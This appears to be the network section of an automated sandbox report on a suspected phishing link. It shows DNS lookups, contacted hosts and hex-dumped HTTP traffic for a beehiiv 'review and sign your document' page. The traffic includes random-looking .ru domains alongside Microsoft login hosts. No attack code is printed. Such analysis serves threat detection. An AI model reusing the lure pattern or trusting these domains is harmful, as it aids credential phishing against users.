                                                                                                                                            Jan 15, 2025 19:14:53.203562021 CET1.1.1.1192.168.2.160xb3bfNo error (0)fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:54.232635975 CET1.1.1.1192.168.2.160x6457No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:54.232635975 CET1.1.1.1192.168.2.160x6457No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:54.265108109 CET1.1.1.1192.168.2.160x46efNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:54.265108109 CET1.1.1.1192.168.2.160x46efNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:55.362090111 CET1.1.1.1192.168.2.160xa6ccNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:55.362090111 CET1.1.1.1192.168.2.160xa6ccNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:56.217663050 CET1.1.1.1192.168.2.160x3016No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:56.217663050 CET1.1.1.1192.168.2.160x3016No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:56.217663050 CET1.1.1.1192.168.2.160x3016No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:56.281222105 CET1.1.1.1192.168.2.160x6b0fNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:56.281222105 CET1.1.1.1192.168.2.160x6b0fNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:56.281577110 CET1.1.1.1192.168.2.160xabb4No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:56.281577110 CET1.1.1.1192.168.2.160xabb4No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:57.370068073 CET1.1.1.1192.168.2.160x7c2No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:57.371892929 CET1.1.1.1192.168.2.160x2e90No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:44.212299109 CET1.1.1.1192.168.2.160x84fcNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:44.212918043 CET1.1.1.1192.168.2.160x595fNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:53.109380007 CET1.1.1.1192.168.2.160x59acNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:53.109987020 CET1.1.1.1192.168.2.160xd1e9No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:54.771948099 CET1.1.1.1192.168.2.160x824dNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:54.772378922 CET1.1.1.1192.168.2.160x8751No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:56.403528929 CET1.1.1.1192.168.2.160xd8c6No error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:56.403528929 CET1.1.1.1192.168.2.160xd8c6No error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:57.162664890 CET1.1.1.1192.168.2.160x3817No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:15:57.162664890 CET1.1.1.1192.168.2.160x3817No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:13.875556946 CET1.1.1.1192.168.2.160xb4dfNo error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:13.911577940 CET1.1.1.1192.168.2.160x1529No error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.494573116 CET1.1.1.1192.168.2.160x47a0No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.494573116 CET1.1.1.1192.168.2.160x47a0No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.495860100 CET1.1.1.1192.168.2.160xeb64No error (0)logincdn.msftauth.netwww.tm.lgincdntcs.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.496193886 CET1.1.1.1192.168.2.160xb41fNo error (0)logincdn.msftauth.netwww.tm.lgincdntcs.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.513503075 CET1.1.1.1192.168.2.160x3aa0No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.513503075 CET1.1.1.1192.168.2.160x3aa0No error (0)sni1gl.wpc.alphacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.513999939 CET1.1.1.1192.168.2.160xcb79No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.535238028 CET1.1.1.1192.168.2.160xf184No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:16.535238028 CET1.1.1.1192.168.2.160xf184No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.232323885 CET1.1.1.1192.168.2.160x1eb2No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.232323885 CET1.1.1.1192.168.2.160x1eb2No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.659648895 CET1.1.1.1192.168.2.160xfbeeNo error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.660788059 CET1.1.1.1192.168.2.160xf490No error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.661864996 CET1.1.1.1192.168.2.160xde5aNo error (0)msft.hsprotect.netmsft.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:18.662630081 CET1.1.1.1192.168.2.160x78c0No error (0)msft.hsprotect.netmsft.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:19.045208931 CET1.1.1.1192.168.2.160xa08dNo error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:19.050050020 CET1.1.1.1192.168.2.160x33ecNo error (0)signup.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:19.664406061 CET1.1.1.1192.168.2.160x9bbNo error (0)client.hsprotect.netclient.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:19.666816950 CET1.1.1.1192.168.2.160x3dd6No error (0)client.hsprotect.netclient.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:20.987798929 CET1.1.1.1192.168.2.160xde01No error (0)client.hsprotect.netclient.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:20.988375902 CET1.1.1.1192.168.2.160xe455No error (0)client.hsprotect.netclient.hsprotect.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.014700890 CET1.1.1.1192.168.2.160xb69fNo error (0)stk.hsprotect.net34.107.199.61A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.034521103 CET1.1.1.1192.168.2.160x6f62No error (0)collector-pxzc5j78di.hsprotect.netinbound-weighted.protechts.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.034521103 CET1.1.1.1192.168.2.160x6f62No error (0)inbound-weighted.protechts.net35.190.10.96A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.034646034 CET1.1.1.1192.168.2.160xefceNo error (0)collector-pxzc5j78di.hsprotect.netinbound-weighted.protechts.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.238224983 CET1.1.1.1192.168.2.160x5322No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.238224983 CET1.1.1.1192.168.2.160x5322No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.249911070 CET1.1.1.1192.168.2.160xb0aaNo error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.275379896 CET1.1.1.1192.168.2.160xf9b4No error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.792831898 CET1.1.1.1192.168.2.160x909fNo error (0)collector-pxzc5j78di.hsprotect.netinbound-weighted.protechts.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.792831898 CET1.1.1.1192.168.2.160x909fNo error (0)inbound-weighted.protechts.net35.190.10.96A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.793050051 CET1.1.1.1192.168.2.160x8e5fNo error (0)collector-pxzc5j78di.hsprotect.netinbound-weighted.protechts.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:21.833646059 CET1.1.1.1192.168.2.160x29daNo error (0)stk.hsprotect.net34.107.199.61A (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:22.047267914 CET1.1.1.1192.168.2.160x4515No error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:16:22.047267914 CET1.1.1.1192.168.2.160x4515No error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                                                                                                            • kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            • https:
                                                                                                                                              • media.beehiiv.com
                                                                                                                                              • beehiiv-adnetwork-production.s3.amazonaws.com
                                                                                                                                              • platform.twitter.com
                                                                                                                                              • syndication.twitter.com
                                                                                                                                              • 2u9o.ptisepma.ru
                                                                                                                                              • o922922.ingest.us.sentry.io
                                                                                                                                              • embed.bsky.app
                                                                                                                                              • challenges.cloudflare.com
                                                                                                                                              • code.jquery.com
                                                                                                                                              • cdnjs.cloudflare.com
                                                                                                                                              • collector-pxebumdlwe.px-cloud.net
                                                                                                                                              • stk.px-cloud.net
                                                                                                                                              • fjuc3ffqsqvx9y7avkadmoheak6kdvhhlnlcmtphukcxpybobixpzqaobm.deryposi.ru
                                                                                                                                              • collector-pxzc5j78di.hsprotect.net
                                                                                                                                              • stk.hsprotect.net
                                                                                                                                            • a.nel.cloudflare.com
                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.1649709104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:30 UTC722OUTGET /p/please-review-and-sign-your-document-below HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2025-01-15 18:14:31 UTC1160INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:31 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736964871&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=3Au882WWuqZUJJKzDm7WMmq4QTMzsZXbByy7hPYyNNU%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736964871&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=3Au882WWuqZUJJKzDm7WMmq4QTMzsZXbByy7hPYyNNU%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=0, s-maxage=10, stale-while-revalidate=10
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            Last-Modified: Wed, 15 Jan 2025 18:14:31 GMT
                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                            Set-Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; path=/; expires=Wed, 15-Jan-25 18:44:31 GMT; domain=.beehiiv.com; HttpOnly; Secure; SameSite=None
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d88b8fd31902-EWR
                                                                                                                                            2025-01-15 18:14:31 UTC209INData Raw: 37 62 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 66 75 6c 6c 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 69 6d 61 67 65
                                                                                                                                            Data Ascii: 7b16<!DOCTYPE html><html lang="en" class="h-full antialiased"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/><link rel="preload" as="image
                                                                                                                                            2025-01-15 18:14:31 UTC1369INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 62 65 65 68 69 69 76 2e 63 6f 6d 2f 63 64 6e 2d 63 67 69 2f 69 6d 61 67 65 2f 66 69 74 3d 73 63 61 6c 65 2d 64 6f 77 6e 2c 66 6f 72 6d 61 74 3d 61 75 74 6f 2c 6f 6e 65 72 72 6f 72 3d 72 65 64 69 72 65 63 74 2c 71 75 61 6c 69 74 79 3d 38 30 2f 73 74 61 74 69 63 5f 61 73 73 65 74 73 2f 64 65 66 61 75 6c 74 73 2f 74 68 75 6d 62 5f 6c 6f 67 6f 2e 70 6e 67 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 62 65 65 68 69 69 76 2d 61 64 6e 65 74 77 6f 72 6b 2d 70 72 6f 64 75 63 74 69 6f 6e 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 70 69 78 65 6c 2d 6a 73 2e 6a 73 22 20 61 73 79 6e 63 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 6f
                                                                                                                                            Data Ascii: " href="https://media.beehiiv.com/cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/static_assets/defaults/thumb_logo.png"/><script src="https://beehiiv-adnetwork-production.s3.amazonaws.com/pixel-js.js" async=""></script><meta name="mo
                                                                                                                                            2025-01-15 18:14:31 UTC1369INData Raw: 38 37 31 65 61 64 2e 62 65 65 68 69 69 76 2e 63 6f 6d 2f 70 2f 70 6c 65 61 73 65 2d 72 65 76 69 65 77 2d 61 6e 64 2d 73 69 67 6e 2d 79 6f 75 72 2d 64 6f 63 75 6d 65 6e 74 2d 62 65 6c 6f 77 22 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 75 72 6c 22 2f 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 6c 65 61 73 65 20 72 65 76 69 65 77 20 61 6e 64 20 73 69 67 6e 20 79 6f 75 72 20 64 6f 63 75 6d 65 6e 74 20 42 65 6c 6f 77 22 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 2f 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 44 61 74 65 20 31 39 2f 30 31 32 30 32 35 22 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 2f 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 62 65 65 68 69 69 76
                                                                                                                                            Data Ascii: 871ead.beehiiv.com/p/please-review-and-sign-your-document-below" name="twitter:url"/><meta content="Please review and sign your document Below" name="twitter:title"/><meta content="Date 19/012025" name="twitter:description"/><meta content="https://beehiiv
                                                                                                                                            2025-01-15 18:14:31 UTC1369INData Raw: 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6d 61 6e 69 66 65 73 74 2d 62 66 63 37 62 61 39 65 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 65 6e 74 72 79 2e 63 6c 69 65 6e 74 2d 43 75 42 73 6e 6b 2d 31 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6a 73 78 2d 72 75 6e 74 69 6d 65 2d 42 6a 47 5f 7a 56 31 57 2e 6a 73
                                                                                                                                            Data Ascii: /><link rel="modulepreload" href="/assets/manifest-bfc7ba9e.js"/><link rel="modulepreload" href="/assets/entry.client-CuBsnk-1.js"/><link rel="modulepreload" href="/assets/index-D6da9p6-.js"/><link rel="modulepreload" href="/assets/jsx-runtime-BjG_zV1W.js
                                                                                                                                            2025-01-15 18:14:31 UTC1369INData Raw: 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 74 72 61 6e 73 69 74 69 6f 6e 2d 79 2d 35 58 46 46 75 75 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 68 69 64 64 65 6e 2d 4b 75 6f 58 6d 69 4e 35 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 59 6f 75 74 75 62 65 49 63 6f 6e 2d 44 53 6f 75 4d 51 69 4e 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 75 73 65 2d 72 6f 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 73 2d 44 6d 79 57 46 77 75 6f 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c
                                                                                                                                            Data Ascii: load" href="/assets/transition-y-5XFFuu.js"/><link rel="modulepreload" href="/assets/hidden-KuoXmiN5.js"/><link rel="modulepreload" href="/assets/YoutubeIcon-DSouMQiN.js"/><link rel="modulepreload" href="/assets/use-root-containers-DmyWFwuo.js"/><link rel
                                                                                                                                            2025-01-15 18:14:31 UTC1369INData Raw: 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 70 6f 70 6f 76 65 72 2d 43 56 31 4a 2d 46 46 70 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 49 55 2d 48 72 73 31 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 75 73 65 53 65 74 4c 61 73 74 56 69 65 77 65 64 52 65 73 6f 75 72 63 65 2d 42 65 6c 52 6f 4b 69 36 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 63 70 4e 6b 2d 4f 49 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c
                                                                                                                                            Data Ascii: ad" href="/assets/popover-CV1J-FFp.js"/><link rel="modulepreload" href="/assets/index-DIU-Hrs1.js"/><link rel="modulepreload" href="/assets/useSetLastViewedResource-BelRoKi6.js"/><link rel="modulepreload" href="/assets/index-DcpNk-OI.js"/><link rel="modul
                                                                                                                                            2025-01-15 18:14:31 UTC1369INData Raw: 5a 78 48 5f 72 72 33 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 46 72 65 65 47 61 74 65 64 43 6f 6e 74 65 6e 74 2d 44 2d 45 57 72 30 49 5a 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 54 77 69 74 74 65 72 45 6d 62 65 64 2d 77 49 44 43 44 41 58 61 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 43 43 75 2d 47 5f 74 79 2e 6a 73 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 6f 64 75 6c 65 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 69 6e 64 65
                                                                                                                                            Data Ascii: ZxH_rr3.js"/><link rel="modulepreload" href="/assets/FreeGatedContent-D-EWr0IZ.js"/><link rel="modulepreload" href="/assets/TwitterEmbed-wIDCDAXa.js"/><link rel="modulepreload" href="/assets/index-CCu-G_ty.js"/><link rel="modulepreload" href="/assets/inde
                                                                                                                                            2025-01-15 18:14:31 UTC1369INData Raw: 65 63 6f 6e 64 61 72 79 2d 63 6f 6c 6f 72 3a 20 23 46 39 46 41 46 42 3b 0a 20 20 2d 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2d 63 6f 6c 6f 72 3a 20 23 30 33 30 37 31 32 3b 0a 0a 20 20 2d 2d 77 74 2d 74 65 72 74 69 61 72 79 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 2d 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 74 65 72 74 69 61 72 79 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 32 32 32 3b 0a 0a 20 20 2d 2d 77 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 2d 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 33 30 37 31 32 3b 0a 0a 20 20 2d 2d 77 74 2d 73 75 62 73 63 72 69 62 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46
                                                                                                                                            Data Ascii: econdary-color: #F9FAFB; --wt-text-on-secondary-color: #030712; --wt-tertiary-color: #FFFFFF; --wt-text-on-tertiary-color: #222222; --wt-background-color: #FFFFFF; --wt-text-on-background-color: #030712; --wt-subscribe-background-color: #FF
